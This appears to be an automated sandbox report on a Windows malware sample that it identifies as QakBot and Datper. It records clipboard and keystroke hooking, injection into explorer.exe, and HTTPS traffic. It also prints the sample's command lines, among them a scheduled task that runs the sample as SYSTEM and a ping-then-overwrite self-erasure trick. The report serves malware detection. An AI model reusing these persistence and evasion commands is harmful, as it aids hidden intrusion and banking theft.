Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/service/ip-location-database
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/shariff/shariff.complete.css
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/shariff/shariff.complete.js
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/site-list
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/sitemap
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/speedtest/
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/trace-email-address
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/verify-email-address
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/website/
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/website/express.de
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/website/indoxxi.center
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/what-is-my-ip-address
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: https://www.ip-adress.com/whois-lookup

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49158
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49160
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Hooks clipboard functions (used to sniff clipboard data)

Show sources

Source: explorer.exe

IAT, EAT or inline hook detected: module: USER32.dll function: GetClipboardData

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Windows\System32\taskhost.exe

Code function: 19_2_015D9210 GetModuleHandleA,GetProcAddress,GetKeyboardState,ToAscii,

19_2_015D9210

E-Banking Fraud:

Hooks winsocket function (used for sniffing or altering network traffic)

Show sources

Source: explorer.exe

File created: function: HttpSendRequestExW

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot Payload Author: kevoreilly
Source: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot Payload Author: kevoreilly
Source: 12.2.explorer.exe.3f0000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 12.2.explorer.exe.3f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 14.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 12.2.explorer.exe.1500000.3.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 7.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 6.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 2.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 0.2.zhAQkCQvME.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 12.2.explorer.exe.1500000.3.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 5.2.zhAQkCQvME.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 18.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 1.2.zhAQkCQvME.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 17.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly

Contains functionality to call native functions

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_0040C370 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,GetCurrentProcess,NtDuplicateObject,CloseHandle,_wcscmp,CloseHandle,CloseHandle,CloseHandle,StrStrIW,CloseHandle,CloseHandle,	0_2_0040C370
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015D940B NtQueryInformationThread,GetCurrentProcessId,NtResumeThread,	19_2_015D940B
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013B940B NtQueryInformationThread,GetCurrentProcessId,NtResumeThread,	21_2_013B940B
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011D940B NtQueryInformationThread,GetCurrentProcessId,NtResumeThread,	24_2_011D940B
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011B940B NtQueryInformationThread,GetCurrentProcessId,NtResumeThread,	25_2_011B940B

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00404400 GetLastError,EqualSid,memset,CreateProcessAsUserW,CloseHandle,

0_2_00404400

Creates mutexes

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{D72D0A04-1F72-49F1-8077-3C73EF051907}
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{B9EC2CD2-EC20-4B7F-99E4-9EB20CB3037F}
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Mutant created: \BaseNamedObjects\Global\{D72D0A04-1F72-49F1-8077-3C73EF051907}
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Mutant created: \Sessions\1\BaseNamedObjects\wuinmr

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_00409C00	0_2_00409C00
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_0040A090	0_2_0040A090
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_0040F770	0_2_0040F770
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_004031F0	0_2_004031F0
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_0041280F	0_2_0041280F
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_00402690	0_2_00402690
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_0040CEA0	0_2_0040CEA0
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_004088B0	0_2_004088B0
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_00413120	0_2_00413120
Source: C:\Windows\explorer.exe	Code function: 12_2_003F2690	12_2_003F2690
Source: C:\Windows\explorer.exe	Code function: 12_2_003F9C00	12_2_003F9C00
Source: C:\Windows\explorer.exe	Code function: 12_2_0040280F	12_2_0040280F
Source: C:\Windows\explorer.exe	Code function: 12_2_003F88B0	12_2_003F88B0
Source: C:\Windows\explorer.exe	Code function: 12_2_003FA090	12_2_003FA090
Source: C:\Windows\explorer.exe	Code function: 12_2_00403120	12_2_00403120
Source: C:\Windows\explorer.exe	Code function: 12_2_003F31F0	12_2_003F31F0
Source: C:\Windows\explorer.exe	Code function: 12_2_003FCEA0	12_2_003FCEA0
Source: C:\Windows\explorer.exe	Code function: 12_2_003FF770	12_2_003FF770
Source: C:\Windows\explorer.exe	Code function: 12_2_0151EA50	12_2_0151EA50
Source: C:\Windows\explorer.exe	Code function: 12_2_0151E5C0	12_2_0151E5C0
Source: C:\Windows\explorer.exe	Code function: 12_2_01511112	12_2_01511112
Source: C:\Windows\explorer.exe	Code function: 12_2_015131DC	12_2_015131DC
Source: C:\Windows\explorer.exe	Code function: 12_2_015269AF	12_2_015269AF
Source: C:\Windows\explorer.exe	Code function: 12_2_01511A1B	12_2_01511A1B
Source: C:\Windows\explorer.exe	Code function: 12_2_01512AD6	12_2_01512AD6
Source: C:\Windows\explorer.exe	Code function: 12_2_015272C0	12_2_015272C0
Source: C:\Windows\explorer.exe	Code function: 12_2_01515530	12_2_01515530
Source: C:\Windows\explorer.exe	Code function: 12_2_01511533	12_2_01511533
Source: C:\Windows\explorer.exe	Code function: 12_2_01523C50	12_2_01523C50
Source: C:\Windows\explorer.exe	Code function: 12_2_01520650	12_2_01520650
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015E9EC0	19_2_015E9EC0
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015E7100	19_2_015E7100
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015E51D0	19_2_015E51D0
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015EB580	19_2_015EB580
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015E4C00	19_2_015E4C00
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015D1430	19_2_015D1430
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015E2382	19_2_015E2382
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015E1AD0	19_2_015E1AD0
Source: C:\Windows\System32\taskhost.exe	Code function: 19_2_015E9AF0	19_2_015E9AF0
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013C9EC0	21_2_013C9EC0
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013C7100	21_2_013C7100
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013C51D0	21_2_013C51D0
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013DA1CF	21_2_013DA1CF
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013DA354	21_2_013DA354
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013DA352	21_2_013DA352
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013C2382	21_2_013C2382
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013C9AF0	21_2_013C9AF0
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013C1AD0	21_2_013C1AD0
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013CB580	21_2_013CB580
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013B1430	21_2_013B1430
Source: C:\Windows\System32\dwm.exe	Code function: 21_2_013C4C00	21_2_013C4C00
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011E9EC0	24_2_011E9EC0
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011E7100	24_2_011E7100
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011E51D0	24_2_011E51D0
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011FA1CF	24_2_011FA1CF
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011FA354	24_2_011FA354
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011FA352	24_2_011FA352
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011E2382	24_2_011E2382
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011E1AD0	24_2_011E1AD0
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011E9AF0	24_2_011E9AF0
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011EB580	24_2_011EB580
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011E4C00	24_2_011E4C00
Source: C:\Windows\System32\conhost.exe	Code function: 24_2_011D1430	24_2_011D1430
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011C9EC0	25_2_011C9EC0
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011C7100	25_2_011C7100
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011C51D0	25_2_011C51D0
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011DA1CF	25_2_011DA1CF
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011DA354	25_2_011DA354
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011DA352	25_2_011DA352
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011C2382	25_2_011C2382
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011C1AD0	25_2_011C1AD0
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011C9AF0	25_2_011C9AF0
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011CB580	25_2_011CB580
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011C4C00	25_2_011C4C00
Source: C:\Windows\System32\notepad.exe	Code function: 25_2_011B1430	25_2_011B1430

Found potential string decryption / allocating functions

Show sources

Source: C:\Windows\explorer.exe

Code function: String function: 01510CBC appears 37 times

PE file contains strange resources

Show sources

Source: zhAQkCQvME.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zhAQkCQvME.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zhAQkCQvME.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Sample file is different than original file name gathered from version info

Show sources

Source: zhAQkCQvME.exe, 00000000.00000002.470874320.006C3000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamerjrwer.exev vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000000.00000002.470874320.006C3000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamerjrwer.exe vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000000.00000002.470376366.002B0000.00000008.00000001.sdmp	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000001.00000000.447916030.0049E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamerjrwer.exe vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000001.00000002.451933719.00170000.00000008.00000001.sdmp	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000005.00000002.489044820.01260000.00000008.00000001.sdmp	Binary or memory string: originalfilename vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000005.00000002.489044820.01260000.00000008.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000005.00000002.482849544.002B0000.00000008.00000001.sdmp	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000005.00000000.472415467.0049E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamerjrwer.exe vs zhAQkCQvME.exe
Source: zhAQkCQvME.exe, 00000005.00000002.485204244.00A60000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs zhAQkCQvME.exe

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

File read: C:\Users\user\Desktop\zhAQkCQvME.exe

Jump to behavior

Yara signature match

Show sources

Source: 00000005.00000002.488530565.00EF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 0000000C.00000003.535349218.01779000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 00000000.00000002.470976903.015F7000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 00000000.00000002.472365977.01B20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 00000005.00000002.485394157.00AC7000.00000004.00000040.sdmp, type: MEMORY	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 12.2.explorer.exe.3f0000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 12.2.explorer.exe.3f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 14.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 12.2.explorer.exe.1500000.3.unpack, type: UNPACKEDPE	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 12.2.explorer.exe.1500000.3.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 7.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 6.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 2.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 0.2.zhAQkCQvME.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 12.2.explorer.exe.1500000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Datper author = JPCERT/CC Incident Response Group, description = detect Datper in memory, rule_usage = memory scan, reference = https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html
Source: 12.2.explorer.exe.1500000.3.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 5.2.zhAQkCQvME.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 18.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 1.2.zhAQkCQvME.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 17.2.jkfkdm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload

PE file contains an invalid data directory

Show sources

Source: zhAQkCQvME.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_SECURITY size: 0x4 address: 0x0
Source: jkfkdm.exe.0.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_SECURITY size: 0x4 address: 0x0

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Show sources

Source: zhAQkCQvME.exe	Static PE information: Section: CODE ZLIB complexity 0.999666291739
Source: jkfkdm.exe.0.dr	Static PE information: Section: CODE ZLIB complexity 0.999666291739

Classification label

Show sources

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@25/7@2/4

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00407340 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_00407340

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00404290 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,CloseHandle,

0_2_00404290

Contains functionality to instantiate COM classes

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00410920 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,

0_2_00410920

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00408290 FindResourceA,SizeofResource,LoadResource,

0_2_00408290

Contains functionality to modify services (start/stop/modify)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Code function: 0_2_00401420 StartServiceCtrlDispatcherA,

0_2_00401420

Contains functionality to register a service control handler (likely the sample is a service DLL)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_00401420 StartServiceCtrlDispatcherA,		0_2_00401420
Source: C:\Windows\explorer.exe	Code function: 12_2_003F1420 StartServiceCtrlDispatcherA,		12_2_003F1420

Creates files inside the user directory

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown

Jump to behavior

Creates temporary files

Show sources

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\~jkfkdm.tmp

Jump to behavior

Found command line output

Show sources

Source: C:\Windows\System32\schtasks.exe	Console Write: ........a..v..0.....d...`...D....f..........................`.L...l.<.n.0.n.......!...L.........0.!.........rp....!.G..u			Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Console Write: ........a..v..0.........$...L...,n..........................`.....&.x.....(...................................w.....G..u			Jump to behavior

Launches a second explorer.exe instance

Show sources

Source: unknown	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

PE file has an executable .text section and no other executable section

Show sources

Source: zhAQkCQvME.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Queries a list of all open handles

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

System information queried: HandleInformation

Jump to behavior

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Reads software policies

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: zhAQkCQvME.exe

Virustotal: Detection: 76%

Sample requires command line parameters (based on API chain)

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe

Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\zhAQkCQvME.exe 'C:\Users\user\Desktop\zhAQkCQvME.exe'
Source: unknown	Process created: C:\Users\user\Desktop\zhAQkCQvME.exe C:\Users\user\Desktop\zhAQkCQvME.exe /C
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn ahizzkkevf /tr '\'C:\Users\user\Desktop\zhAQkCQvME.exe\' /I ahizzkkevf' /SC ONCE /Z /ST 19:29 /ET 19:41
Source: unknown	Process created: C:\Users\user\Desktop\zhAQkCQvME.exe C:\Users\user\Desktop\zhAQkCQvME.exe /I ahizzkkevf
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ping.exe -n 6 127.0.0.1 & type 'C:\Windows\System32\calc.exe' > 'C:\Users\user\Desktop\zhAQkCQvME.exe'
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /DELETE /F /TN ahizzkkevf
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping.exe -n 6 127.0.0.1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe 'C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process created: C:\Users\user\Desktop\zhAQkCQvME.exe C:\Users\user\Desktop\zhAQkCQvME.exe /C	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn ahizzkkevf /tr '\'C:\Users\user\Desktop\zhAQkCQvME.exe\' /I ahizzkkevf' /SC ONCE /Z /ST 19:29 /ET 19:41	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c ping.exe -n 6 127.0.0.1 & type 'C:\Windows\System32\calc.exe' > 'C:\Users\user\Desktop\zhAQkCQvME.exe'	Jump to behavior
Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /DELETE /F /TN ahizzkkevf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe /C	Jump to behavior
